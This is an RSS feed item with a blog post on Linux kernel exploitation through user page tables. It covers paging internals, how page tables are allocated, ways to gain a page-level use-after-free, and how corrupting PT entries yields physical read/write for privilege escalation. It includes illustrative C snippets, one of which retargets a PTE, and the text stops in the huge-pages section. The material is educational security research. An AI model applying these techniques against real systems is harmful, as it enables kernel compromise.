<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>sam4k</title><description>blogging about pwning kernels and os internals</description><link>https://sam4k.com/</link><atom:link href="https://sam4k.com/rss/" rel="self" type="application/rss+xml"/><generator>Hugo</generator><language>en-us</language><image><url>https://sam4k.com/content/images/2021/07/linux.png</url><title>sam4k</title><link>https://sam4k.com/</link></image><lastBuildDate>Wed, 07 May 2025 14:01:41 +0000</lastBuildDate><ttl>60</ttl><item><title>Kernel Exploitation Techniques: Turning The (Page) Tables</title><description>This post explores attacking page tables as a Linux kernel exploitation technique for gaining powerful read/write primitives.</description><link>https://sam4k.com/page-table-kernel-exploitation/</link><guid isPermaLink="false">67fbb9eb752e23048bb85792</guid><category>linux</category><category>kernel</category><category>memory</category><category>xdev</category><dc:creator>sam4k</dc:creator><pubDate>Wed, 07 May 2025 14:01:41 +0000</pubDate><media:content url="https://sam4k.com/content/images/2025/07/tired_computer.gif" medium="image"/><content:encoded><![CDATA[<p>Two posts in the space of two weeks?! What on earth has gotten into me. Well, I figured I ought to get into the OffensiveCon spirit and get another post on exploitation out there.</p>
<p>So today we&rsquo;ll be looking at (user) page table exploitation. If you&rsquo;ve been keeping up with some of the great kernel exploitation research put out there lately (plenty of which I will be sharing in this article, don&rsquo;t worry!), you might have noticed a trend in techniques targeting page tables in order to gain powerful read/write primitives.</p>
<p>The goal for this post is to provide some insight into why targeting page tables can be such a powerful exploitation technique. We&rsquo;ll do a primer on how paging works in Linux, to give us some context, before looking at how we can gain control of page tables in the first place, how to exploit them for privilege escalation and mitigations to be aware of.</p>
<p>As I mentioned, there&rsquo;s a plethora of great research out there, so where relevant I&rsquo;ll be linking to it so you can take a deeper dive into specific topics or approaches. At the end of the post I&rsquo;ll include a section grouping all the relevant public research together.</p>
<p>So without further ado, let&rsquo;s get stuck in!</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#paging-primer">Paging Primer</a></li>
<li><a href="#exploitation">Exploitation</a>
<ul>
<li><a href="#user-page-table-allocation">User Page Table Allocation</a></li>
<li><a href="#page-table-corruption">Page Table Corruption?</a>
<ul>
<li><a href="#page-level-primitives">Page-Level Primitives</a></li>
<li><a href="#what-about-other-primitives">What About Other Primitives?</a></li>
</ul>
</li>
<li><a href="#exploiting-a-page-uaf">Exploiting A Page UAF?</a>
<ul>
<li><a href="#pt-entries">PT Entries</a></li>
<li><a href="#huge-pages">Huge Pages</a></li>
<li><a href="#going-for-a-walk">Going For A Walk</a></li>
<li><a href="#approaches">Approaches</a></li>
<li><a href="#on-caching">On Caching</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#mitigations">Mitigations</a>
<ul>
<li><a href="#physical-kaslr">Physical KASLR</a></li>
<li><a href="#read-only-memory">Read-Only Memory</a></li>
</ul>
</li>
<li><a href="#resources">Resources</a></li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
<h2 id="paging-primer">Paging Primer</h2>
<p><img src="https://sam4k.com/content/images/2025/05/what_am_i_looking_at.gif" alt=""></p>
<p>he&rsquo;s looking at pages, get it?</p>
<p>Before we get into the nitty gritty of page tables in kernel exploitation, we should probably quickly cover what page tables are so we understand why exploiting them is so powerful.</p>
<p>Let&rsquo;s pick up where we left off with my <a href="https://sam4k.com/linternals/#virtual-memory">three-part series on virtual memory</a>; if you&rsquo;re not familiar with concepts like physical vs virtual memory or the user virtual address space, feel free to check out those posts for a recap before heading into this section.</p>
<p>Okay, so, we have this general idea of the virtual memory model. Let&rsquo;s take the simple example of running a program, which we&rsquo;ve <a href="https://sam4k.com/linternals-exploring-the-mm-subsystem-part-1/#what-is-memory-management">touched on previously</a>:</p>
<ul>
<li>First, the program itself is stored on disk and must be read</li>
<li>It is loaded into RAM, where the physical address in memory is mapped into our process&rsquo; virtual address space</li>
<li>This &ldquo;mapping&rdquo; means that when our program accesses a mapped virtual address, it will be translated into the appropriate physical address so the memory can be accessed</li>
</ul>
<p>Page tables are what facilitate the translation of virtual to physical addresses. Why &ldquo;page&rdquo; tables? <a href="https://sam4k.com/linternals-memory-allocators-part-1/#page-primer">Recall</a> that virtual memory is divided into &ldquo;pages&rdquo; which are <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/asm-generic/page.h#L18"><code>PAGE_SIZE</code></a> (typically 4096) bytes of contiguous virtual memory; in this case it defines the granularity at which chunks of physical memory are mapped into the virtual address space.</p>
<p>Each process has its own page tables, as does the kernel, to track what parts of its virtual address space are mapped to what parts of physical memory. So how does this work?</p>
<p>Page tables are organised into a hierarchy, or levels, with each table containing pointers to the next level. At the lowest level, the table contains pointers to a page of physical memory. Linux currently supports up to 5 levels<a href="https://docs.kernel.org/mm/page_tables.html">[1]</a>:</p>
<ul>
<li>Page Global Directory (PGD): Each entry in this table points to a P4D</li>
<li>Page Level 4 Directory (P4D): Each entry in this table points to a PUD</li>
<li>Page Upper Directory (PUD): Each entry in this table points to a PMD</li>
<li>Page Middle Directory (PMD): Each entry in this table points to a PT</li>
<li>Page Table (PT): Each entry (PTE) points to a page of physical memory</li>
</ul>
<p>Note that a lot of systems may still use 4 level page tables. In the event a page table level isn&rsquo;t used (i.e. P4D is only used for 5 level page tables), it is &ldquo;folded&rdquo; AKA skipped.</p>
<p>Okay, that sounds fairly straightforward, right? And to add to the page-ception, each of these tables is <code>PAGE_SIZE</code> bytes. But how do these facilitate address translation?</p>
<p><img src="https://sam4k.com/content/images/2025/05/image-1.png" alt=""></p>
<p>Overview of page table structure (Linux x86_64) by <a href="https://www.researchgate.net/scientific-contributions/Hiroki-Kuzuno-2166786557">Hiroki Kuzuno</a>, <a href="https://www.researchgate.net/profile/Toshihiro-Yamauchi-2">Toshihiro Yamauchi</a> <a href="https://www.researchgate.net/figure/Overview-of-page-table-structure-Linux-x86-64-architecture-in-22_fig1_353593783">[1]</a></p>
<p>That&rsquo;s where this helpful diagram comes in! Let&rsquo;s unpack it. In the centre we can see a 4-level page table hierarchy, with the PGD on the left and the final page on the right.</p>
<p>Looking up, we can see the bits that make up a 64-bit x86_64 virtual address. We can see that the offsets into each table level, and the final page, are actually stored in the virtual address! Isn&rsquo;t that neat?!</p>
<p>There&rsquo;s a few extra details to note here. First, keen readers might notice that we&rsquo;re actually only using the lower 48 bits (0-47) of the virtual address! What&rsquo;s that <code>Sign extended</code> portion? As addresses are canonically 64 bits (i.e. that&rsquo;s how they&rsquo;re treated and handled), the remaining bits 48-63 are sign extended (i.e. they copy bit 47).</p>
<p>This bit is important, as it denotes if an address is a low address (for userspace) or a high address (for the kernel virtual address space). Don&rsquo;t believe me? Compare a kernel and userspace address on your x86_64 machine and you&rsquo;ll always see those bits set/unset.</p>
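<p>To make the diagram a bit more concrete, here&rsquo;s a minimal sketch of pulling the table indexes out of a virtual address. It assumes x86_64 with 4-level paging and 4KB pages; <code>split_va()</code>, <code>is_canonical()</code> and <code>struct va_parts</code> are names I&rsquo;ve made up for illustration, not kernel APIs.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdint.h&gt;
#include &lt;stdio.h&gt;

/* Assumption: x86_64, 4-level paging, 4KB pages (9 index bits per level). */
#define PGD_SHIFT   39
#define PUD_SHIFT   30
#define PMD_SHIFT   21
#define PT_SHIFT    12
#define INDEX_MASK  0x1ffULL /* 9 bits: 512 entries per table */
#define OFFSET_MASK 0xfffULL /* 12 bits: byte offset into the 4KB page */

/* Hypothetical helper type, purely for illustration. */
struct va_parts {
    unsigned int pgd, pud, pmd, pt, offset;
};

/* Split a virtual address into its per-level table indexes and page offset. */
static struct va_parts split_va(uint64_t va)
{
    struct va_parts p;

    p.pgd = (unsigned int)((va &gt;&gt; PGD_SHIFT) &amp; INDEX_MASK);
    p.pud = (unsigned int)((va &gt;&gt; PUD_SHIFT) &amp; INDEX_MASK);
    p.pmd = (unsigned int)((va &gt;&gt; PMD_SHIFT) &amp; INDEX_MASK);
    p.pt = (unsigned int)((va &gt;&gt; PT_SHIFT) &amp; INDEX_MASK);
    p.offset = (unsigned int)(va &amp; OFFSET_MASK);
    return p;
}

/* An address is canonical when bits 48-63 are all copies of bit 47. */
static int is_canonical(uint64_t va)
{
    uint64_t top = va &gt;&gt; 47; /* bit 47 plus the 16 sign-extended bits */

    return top == 0 || top == 0x1ffff;
}

int main(void)
{
    uint64_t va = 0x8040201abcULL; /* arbitrary example userspace address */
    struct va_parts p = split_va(va);

    printf(&#34;pgd=%u pud=%u pmd=%u pt=%u offset=0x%x canonical=%d\n&#34;,
           p.pgd, p.pud, p.pmd, p.pt, p.offset, is_canonical(va));
    return 0;
}
</code></pre></div><p>With 5-level paging there would be an extra 9-bit index above the PGD bits, and the sign extension would start at bit 57 instead.</p>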
<p>Some more useful bits (figuratively speaking) worth mentioning are that:</p>
<ul>
<li>Page table entries aren&rsquo;t just pointers to the next level/memory, they can also contain important metadata like permissions (spoiler alert).</li>
<li>It&rsquo;s not just PTEs that can point to physical memory. There&rsquo;s a concept of huge pages, whereby a PMD points to a huge page of physical memory (a bit out of scope for this).</li>
<li>The kernel&rsquo;s page tables are set up at boot time. A process&rsquo; page tables are set up when it&rsquo;s created. It used to be the case that the kernel&rsquo;s page tables were copied into each process&rsquo; tables (remember, they span a mutually exclusive virtual address range).</li>
<li>However, since Meltdown (2018) and speculative execution side-channely shenanigans, Kernel Page Table Isolation (KPTI, <a href="https://cateee.net/lkddb/web-lkddb/PAGE_TABLE_ISOLATION.html"><code>CONFIG_PAGE_TABLE_ISOLATION</code></a> / <a href="https://cateee.net/lkddb/web-lkddb/MITIGATION_PAGE_TABLE_ISOLATION.html"><code>CONFIG_MITIGATION_PAGE_TABLE_ISOLATION</code></a>) was introduced. This removes most kernel mappings from the page tables used in userspace, switching to a separate page table with all the mappings when entering &ldquo;kernel mode&rdquo; (i.e. during a syscall or interrupt).</li>
</ul>
<p>I&rsquo;ll touch on all of this in much more detail in the next instalment of my memory <a href="https://sam4k.com/linternals/#memory-management">management linternals series</a>, but there&rsquo;s also plenty of great resources out there<a href="https://docs.kernel.org/mm/page_tables.html">[1]</a><a href="https://github.com/lorenzo-stoakes/linux-vm-notes/blob/master/sections/page-tables.md">[2]</a>.</p>
<hr>
<ol>
<li><a href="https://docs.kernel.org/mm/page_tables.html">https://docs.kernel.org/mm/page_tables.html</a></li>
<li><a href="https://github.com/lorenzo-stoakes/linux-vm-notes/blob/master/sections/page-tables.md">https://github.com/lorenzo-stoakes/linux-vm-notes/blob/master/sections/page-tables.md</a></li>
</ol>
<h2 id="exploitation">Exploitation</h2>
<p><img src="https://sam4k.com/content/images/2025/05/the_good_part.gif" alt=""></p>
<p>Alright, now we&rsquo;re getting to the fun part! Given what we know about paging in the Linux kernel, we can start to understand why page tables present such a powerful exploitation target.</p>
<p>Gaining control over even a single PTE (or PMD entry, as this could be a huge page) means not just having control over the access permissions for that virtual memory mapping but also the physical address it maps to.</p>
<p>When we think of Kernel Address Space Layout Randomisation (KASLR), we&rsquo;re typically thinking about the virtual address of the kernel. Physical KASLR is slightly different: it may not always be present (as is the case for upstream <code>aarch64</code>) or it may be weaker.</p>
<p>Therefore, control over a PTE belonging to our process essentially grants us an arbitrary physical address read and write, granting control over the kernel while also bypassing mitigations that hinder other techniques.</p>
<p><img src="https://sam4k.com/content/images/2025/05/image-2.png" alt=""></p>
<p>But of course, this is all easier said than done! First we have to control a PTE&hellip;</p>
<p>So we have a target in mind for corruption: page tables. In order to realise that goal, we need to consider:</p>
<ul>
<li>How page tables are allocated by the kernel, so we know what kind of corruption primitive we need to corrupt them</li>
<li>Are there generic approaches to gain a page table corruption primitive?</li>
<li>How do we want to leverage our page table corruption for local privilege escalation?</li>
</ul>
<h3 id="user-page-table-allocation">User Page Table Allocation</h3>
<p>If we want to consider memory corruption, we need to understand how page tables are allocated. As the kernel&rsquo;s page tables are set up at boot time, this section will just focus on how user page tables (i.e. for a userspace process) are allocated.</p>
<p>I&rsquo;ll save the deep dive for linternals and cut to the chase. User page tables are by default allocated on demand: whenever a virtual address is accessed (read or written) and has a valid physical memory mapping, any missing page tables will be allocated and populated.</p>
<p>We can use some maths to work out exactly when a new page table will be allocated. Recall that each page table is <code>PAGE_SIZE</code> bytes. On a 64-bit system, entries are 64 bits (8 bytes). That means each page table has <code>4096 / 8 = 512</code> entries. We can then work out the virtual address range of each page table level:</p>
<ul>
<li>PTE-level table: Each of the 512 entries points to <code>PAGE_SIZE</code> bytes of physical memory. Therefore it spans <code>512 x 4096 = 2097152 = 0x200000 = 2MB</code>.</li>
<li>Page Middle Directory (PMD): Each entry spans 2MB. An entry may point to a PT or a 2MB block of memory (a huge page). The PMD itself spans <code>512 x 0x200000 = 0x40000000 = 1GB</code>.</li>
<li>This continues with the PUD spanning 512GB and the PGD spanning 256TB.</li>
</ul>
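<p>If you&rsquo;d rather let the computer do the maths, the spans above can be reproduced with a quick sketch like the one below. It assumes 4KB pages, 8 byte entries and 4-level paging; <code>table_span()</code> and <code>table_base()</code> are hypothetical helpers for illustration only.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdint.h&gt;
#include &lt;stdio.h&gt;

/* Assumptions: 4KB pages and 8 byte entries, as on x86_64. */
#define PAGE_SIZE         4096ULL
#define ENTRY_SIZE        8ULL
#define ENTRIES_PER_TABLE (PAGE_SIZE / ENTRY_SIZE) /* 512 */

/* Level numbering is made up for this sketch: 0 = PT, 1 = PMD, 2 = PUD, 3 = PGD. */
static uint64_t table_span(int level)
{
    uint64_t span = PAGE_SIZE;

    /* Each level up covers 512 times the range of the level below it. */
    for (int i = 0; i &lt;= level; i++)
        span *= ENTRIES_PER_TABLE;
    return span;
}

/* Virtual address mapped by the first entry of the table covering va. */
static uint64_t table_base(uint64_t va, int level)
{
    return va &amp; ~(table_span(level) - 1);
}

int main(void)
{
    static const char *names[] = { &#34;PT&#34;, &#34;PMD&#34;, &#34;PUD&#34;, &#34;PGD&#34; };

    for (int level = 0; level &lt; 4; level++)
        printf(&#34;%-3s spans 0x%llx bytes\n&#34;, names[level],
               (unsigned long long)table_span(level));

    printf(&#34;PT covering 0x40234567 starts at 0x%llx\n&#34;,
           (unsigned long long)table_base(0x40234567ULL, 0));
    return 0;
}
</code></pre></div>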
<p>We can infer from this that the virtual address of the first entry of a PTE-level table is aligned to <code>0x200000</code>. If we <code>mmap()</code> a page of anonymous memory to a fixed address, aligned to this value we can determine a few things:</p>
<ul>
<li>This virtual address&rsquo; mapping will be the first entry in its PTE-level table</li>
<li>If there haven&rsquo;t been any other mappings in this page table (i.e. for the next <code>0x200000 - 0x1000</code> bytes), then this page table hasn&rsquo;t been allocated yet. Thus, accessing (read/writing) this mapping will cause it to be allocated.</li>
</ul>
<p>Another quirk to note is that <code>mmap()</code> can be passed the <code>MAP_POPULATE</code> flag to populate the necessary page tables at the time the mapping is created.</p>
<p>With that mildly relevant tangent out of the way, let&rsquo;s look at some code. Due to the tight integration with the hardware, some of the page table handling code is architecture specific. For <code>x86_64</code> our trail starts here:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">gfp_t</span> <span class="n">__userpte_alloc_gfp</span> <span class="o">=</span> <span class="n">GFP_PGTABLE_USER</span> <span class="o">|</span> <span class="n">PGTABLE_HIGHMEM</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">pgtable_t</span> <span class="nf">pte_alloc_one</span><span class="p">(</span><span class="k">struct</span> <span class="n">mm_struct</span> <span class="o">*</span><span class="n">mm</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="nf">__pte_alloc_one</span><span class="p">(</span><span class="n">mm</span><span class="p">,</span> <span class="n">__userpte_alloc_gfp</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>arch/x86/mm/pgtable.c</p>
<p>Note the GFP flags used: <code>GFP_PGTABLE_USER | PGTABLE_HIGHMEM</code>. A few calls deeper we then get to the <code>asm-generic</code> implementation, <code>pagetable_alloc_noprof()</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">/**
</span></span><span class="line"><span class="cl"> * pagetable_alloc - Allocate pagetables
</span></span><span class="line"><span class="cl"> * @gfp:    GFP flags
</span></span><span class="line"><span class="cl"> * @order:  desired pagetable order
</span></span><span class="line"><span class="cl"> *
</span></span><span class="line"><span class="cl"> * pagetable_alloc allocates memory for page tables as well as a page table
</span></span><span class="line"><span class="cl"> * descriptor to describe that memory.
</span></span><span class="line"><span class="cl"> *
</span></span><span class="line"><span class="cl"> * Return: The ptdesc describing the allocated page tables.
</span></span><span class="line"><span class="cl"> */
</span></span><span class="line"><span class="cl">static inline struct ptdesc *pagetable_alloc_noprof(gfp_t gfp, unsigned int order)
</span></span><span class="line"><span class="cl">{
</span></span><span class="line"><span class="cl">	struct page *page = alloc_pages_noprof(gfp | __GFP_COMP, order);
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	return page_ptdesc(page);
</span></span><span class="line"><span class="cl">}
</span></span></code></pre></div><p>include/asm-generic/pgalloc.h (used for PTs, PMDs and PUDs)</p>
<p>As we can see user page tables are allocated using the page allocator, with GFP flags <code>GFP_PGTABLE_USER | PGTABLE_HIGHMEM | __GFP_COMP</code>. Okay, one step closer!</p>
<p>Now we know we&rsquo;re dealing with the page allocator. This means that if we want to use a memory corruption primitive to control a page table, we need to have some control over a similarly allocated page from the same allocator. Let&rsquo;s explore this a bit:</p>
<p><img src="https://sam4k.com/content/images/2025/05/phys_mem_mgmt.png" alt=""></p>
<p><a href="https://powerofcommunity.net/poc2024/Pan%20Zhenpeng%20&amp;%20Jheng%20Bing%20Jhong,%20GPUAF%20-%20Two%20ways%20of%20rooting%20All%20Qualcomm%20based%20Android%20phones.pdf">GPUAF slides</a> by PAN ZHENPENG &amp; JHENG BING JHONG</p>
<p>Above is a diagram showing some page allocator internals. <a href="https://sam4k.com/linternals-memory-allocators-part-1/#0x02-the-buddy-page-allocator">Recall</a> that the page allocator manages chunks of physically contiguous memory by <code>order</code>, where the size of the chunk is <code>2^order * PAGE_SIZE</code>.</p>
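<p>As a quick illustration of how <code>order</code> relates to size, here&rsquo;s a small sketch assuming 4KB pages. Both <code>chunk_size()</code> and <code>order_for_size()</code> are hypothetical userspace helpers, not the kernel&rsquo;s own implementation.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stddef.h&gt;
#include &lt;stdio.h&gt;

#define PAGE_SIZE 4096UL /* assumption: 4KB pages */

/* Size in bytes of a chunk of the given order, i.e. 2^order pages. */
static size_t chunk_size(unsigned int order)
{
    return PAGE_SIZE &lt;&lt; order;
}

/* Smallest order whose chunk can hold the requested number of bytes. */
static unsigned int order_for_size(size_t bytes)
{
    unsigned int order = 0;

    while (chunk_size(order) &lt; bytes)
        order++;
    return order;
}

int main(void)
{
    for (unsigned int order = 0; order &lt; 4; order++)
        printf(&#34;order %u = %zu bytes\n&#34;, order, chunk_size(order));

    /* A page table is exactly one page, so it fits in an order-0 chunk. */
    printf(&#34;page table order = %u\n&#34;, order_for_size(PAGE_SIZE));
    return 0;
}
</code></pre></div>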
<p>Free memory chunks are managed by the <code>free_area</code> list, whose index is the <code>order</code> of the free chunks of memory it manages. Each <code>order</code> then has a <code>free_list</code> for each of the <code>MIGRATE_TYPES</code>, which points to the actual memory chunks. Working our way back you&rsquo;ll then notice each zone has its own <code>free_area</code> list&hellip; Not to mention each CPU maintains its own per-CPU page cache&hellip; So yeah, that&rsquo;s a lot.</p>
<p>This means when we&rsquo;re doing any kind of page allocator-level corruption we need to be aware of all the variables: the CPU cache, zone, migrate type etc.</p>
<p>In our situation: Our page table is <code>PAGE_SIZE</code> bytes, so a single order 0 page. The GFP flags determine the zone and migrate type. Let&rsquo;s quickly walk through those:</p>
<ul>
<li><code>GFP_PGTABLE_USER</code> after peeling back the macros is <code>__GFP_RECLAIM | __GFP_IO | __GFP_FS | __GFP_ZERO | __GFP_ACCOUNT</code>. No <code>__GFP_RECLAIMABLE|__GFP_MOVABLE</code> means no <code>MIGRATE_MOVABLE</code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/gfp.h#L16">[3]</a>.</li>
<li><code>PGTABLE_HIGHMEM</code> is effectively 0 unless <code>CONFIG_HIGHMEM</code> is set.</li>
<li><code>__GFP_COMP</code> is for compound pages<a href="https://lwn.net/Articles/619514/">[4]</a>, but doesn&rsquo;t affect our zone/migrate type.</li>
</ul>
<p>So to sum it all up: page tables are order-0 pages allocated by the page allocator, from <code>ZONE_NORMAL</code>, <code>MIGRATE_UNMOVABLE</code>.</p>
<h3 id="page-table-corruption">Page Table Corruption?</h3>
<p><img src="https://sam4k.com/content/images/2025/05/tell_me_more.gif" alt=""></p>
<p>Okay, we know what page tables are, why they&rsquo;re powerful targets for exploitation and now we also know how user page tables are allocated - so how do we get control of one?!</p>
<p>The vulnerability research gods are fickle ones and we&rsquo;re often at the whims of the primitives we&rsquo;re given. So let&rsquo;s explore a few cases and how we might leverage them to get control of a page table.</p>
<h4 id="page-level-primitives">Page-Level Primitives</h4>
<p>By far the &ldquo;easiest&rdquo; way would be if we had a nice <strong>order-0 page use-after-free (UAF)</strong>, with suitable zone and migrate types. In this scenario, we could do some classic memory fengshui to have our page reallocated as a page table.</p>
<p>Even if it wasn&rsquo;t an order-0 page, due to the <a href="https://sam4k.com/linternals-memory-allocators-part-1/#buddy-system-algorithm">buddy algorithm</a>, if we exhaust the order-0 pages the allocator will split order-1 pages, if they&rsquo;re exhausted then order-2 and so on. A similar technique could be used to exploit a page allocator level out-of-bounds write (OOBW), by having our OOBW source page allocated adjacent to our page table.</p>
<p>I thought I&rsquo;d share some cool public research demonstrating this. Funnily enough, page-level UAFs aren&rsquo;t too common, so both examples are from GPU bugs:</p>
<ul>
<li><a href="https://powerofcommunity.net/poc2024/Pan%20Zhenpeng%20&amp;%20Jheng%20Bing%20Jhong,%20GPUAF%20-%20Two%20ways%20of%20rooting%20All%20Qualcomm%20based%20Android%20phones.pdf">GPUAF - Two ways of Rooting All Qualcomm based Android phones</a> (aarch64)</li>
<li><a href="https://i.blackhat.com/BH-US-24/Presentations/REVISED02-US24-Gong-The-Way-to-Android-Root-Wednesday.pdf">The Way to Android Root: Exploiting Your GPU On Smartphone</a> (aarch64)</li>
</ul>
<h4 id="what-about-other-primitives">What About Other Primitives?</h4>
<p>But what if we don&rsquo;t have a nice page-level UAF? What if we&rsquo;ve got a run of the mill SLAB allocator-level UAF? Is there any hope for us?! Yes!</p>
<p>As an avid reader of my linternals series, I&rsquo;m sure you&rsquo;ll remember that the slabs used by the SLAB allocator are in fact themselves allocated by the page allocator!</p>
<p>Therefore, if our UAF object is within a slab, perhaps we can cause this slab to get freed, returned to the page allocator and reallocated as a user page table?! We&rsquo;d need to be mindful of the slab&rsquo;s <code>order</code> (aka size) and what write primitives we can get with our UAF in order to corrupt the page table&rsquo;s contents, but it&rsquo;s certainly doable.</p>
<p>How do I know? Because this is the crux of the <a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">Dirty Pagetable technique</a> published by <a href="https://x.com/NVamous">@NVamous</a> back in 2023. This writeup details pivoting several vulnerabilities into page UAFs in order to gain control over user page tables, so check it out for more details!</p>
<p>In a similar vein, PageJack was published in 2024 (<a href="https://phrack.org/issues/71/13#article">Phrack article</a>, <a href="https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf">BlackHat slides</a>) by Jinmeng Zhou, Jiayi Hu, Wenbo Shen &amp; Zhiyun Qian. This technique also aims to provide a generic approach to gain a page UAF, by pivoting our initial primitive to induce the free of specific &ldquo;bridge objects&rdquo; which when freed cause a page UAF.</p>
<p>Below are some more writeups demonstrating these techniques:</p>
<ul>
<li><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606">&ldquo;Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup&rdquo;</a> by <a href="https://x.com/ptryudai">@ptrYudai</a> (x86_64) (2023)</li>
<li><a href="https://pwning.tech/nftables/">&ldquo;Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques&rdquo;</a> by <a href="https://x.com/notselwyn/">@notselwyn</a> expands on the Dirty Pagetable technique (x86_64) (2024)</li>
</ul>
<h3 id="exploiting-a-page-uaf">Exploiting A Page UAF?</h3>
<p><img src="https://sam4k.com/content/images/2025/05/hacking.gif" alt=""></p>
<p>The pieces are finally aligned: we know what page tables are, why they&rsquo;re a big deal and now we even know how to get control of them &hellip; but what do we do with all this power?!</p>
<p>As I mentioned earlier, we&rsquo;re often at the whims of whatever bug the VR gods have tossed our way, so each bug is going to have its own quirks. Maybe you have an 8 byte arbitrary write or maybe you only have control over a single bit. While I can&rsquo;t cover all eventualities, hopefully this section provides enough information to figure it out.</p>
<p>So we have, either directly or through some technique, gained a page UAF, had that page reallocated as a user page table (for our process) and as a result have the means to corrupt all or some portion of the page table - what&rsquo;s next?</p>
<h4 id="pt-entries">PT Entries</h4>
<p>First things first, we want to understand what we&rsquo;re corrupting - what does our page table <em>actually</em> contain? Sure, it maps a specific page of virtual memory to a physical address, but what does this involve?</p>
<p><img src="https://sam4k.com/content/images/2025/05/x86_64_pte-1.png" alt=""></p>
<p>x86_64 PT Entry from <a href="https://wiki.osdev.org/Paging">OSDev.wiki</a></p>
<p>Above is a diagram of what an 8 byte PT entry looks like on x86_64. Here <code>M</code> is the maximum physical address bit, i.e. how many bits are used for addressing. As we touched on earlier, this isn&rsquo;t actually 64, but a smaller value such as 47.</p>
<p>So this is a pretty smart use of space. As we know, these entries map pages in memory (i.e. <code>PAGE_SIZE</code> bytes of memory), so all addresses are page aligned. With a page size of <code>0x1000</code>, this means the lower 12 bits (0-11) are always going to be zero, so they can be used for metadata! Similarly, anything above the maximum address bit can be used for metadata.</p>
<p>Remember, this user page table corresponds to a portion (a 2MB portion specifically) of our process&rsquo; virtual address space. So we&rsquo;re interested in:</p>
<ul>
<li>The address bits, which control the physical page in memory that the virtual address corresponding to this entry will map to when accessed by our process.</li>
<li>The permission bits, particularly if we map a read-only file (such as an SUID binary or system library) into the virtual address range covered by this page table.</li>
</ul>
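<p>To tie the two bullets above to actual bits, here&rsquo;s a rough sketch of decoding and rewriting an x86_64 PT entry from userspace-style C. The bit positions follow the diagram above; the address mask assumes the architectural maximum of <code>M = 52</code>, and the helper names and the example entry value are made up for illustration.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdint.h&gt;
#include &lt;stdio.h&gt;

/* x86_64 PT entry bits, per the diagram above. */
#define PTE_PRESENT (1ULL &lt;&lt; 0)
#define PTE_RW      (1ULL &lt;&lt; 1)  /* writable if set */
#define PTE_USER    (1ULL &lt;&lt; 2)  /* accessible from userspace if set */
#define PTE_NX      (1ULL &lt;&lt; 63) /* no-execute if set */

/* Physical address bits 12-51. Assumption: M = 52, real CPUs may use fewer. */
#define PTE_ADDR_MASK 0x000ffffffffff000ULL

/* Physical address of the page this entry maps. */
static uint64_t pte_phys(uint64_t pte)
{
    return pte &amp; PTE_ADDR_MASK;
}

/* Keep the metadata bits, but point the entry at a different physical page. */
static uint64_t pte_retarget(uint64_t pte, uint64_t phys)
{
    return (pte &amp; ~PTE_ADDR_MASK) | (phys &amp; PTE_ADDR_MASK);
}

int main(void)
{
    /* Made-up entry: present, writable, user, accessed, dirty, NX. */
    uint64_t pte = 0x8000000123456067ULL;

    printf(&#34;phys=0x%llx present=%d rw=%d user=%d nx=%d\n&#34;,
           (unsigned long long)pte_phys(pte),
           !!(pte &amp; PTE_PRESENT), !!(pte &amp; PTE_RW),
           !!(pte &amp; PTE_USER), !!(pte &amp; PTE_NX));

    /* What a corrupted entry might look like: same flags, new target page. */
    printf(&#34;retargeted=0x%llx\n&#34;,
           (unsigned long long)pte_retarget(pte, 0x1000ULL));
    return 0;
}
</code></pre></div><p>The same masking applies to the permission bullet: setting <code>PTE_RW</code> on an entry backing a read-only file mapping is the kind of single-bit change that matters here.</p>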
<h4 id="huge-pages">Huge Pages</h4>
<p>As we&rsquo;ve touched on, PMDs and PUDs are allocated the same way as PTs - via the page allocator. So it is also feasible we could target one of these for our page-UAF.</p>
<p>Albeit, in their default usecase, this would be less practical than corrupting a PT. A PT would let us direct a virtual address to an arbitrary physical address, but PMD and PUD entries point to other tables &hellip; Apart from huge pages!</p>
<p><img src="https://sam4k.com/content/images/2025/05/x86_64_pmd_pud.png" alt=""></p>
<p>x86_64 PUD, PMD and PT Entry from <a href="https://wiki.osdev.org/Paging">OSDev.wiki</a></p>
<p>The above diagram shows the formatting for x86_64 PUD, PMD and PT entries. Both the PUD and PMD entries include a Page Size (<code>PS</code>) attribute. If this bit is set, the entry is treated as mapping to a huge page of physical memory, whose size is appropriate for the page-level.</p>
<p>As we covered earlier, for a PMD this is 2MB and for a PUD it&rsquo;s 1GB. As the physical addresses are aligned to the size of the physical mapping, we can see the PMD entry has even fewer address bits than the PT entry and the PUD even fewer than the PMD.</p>
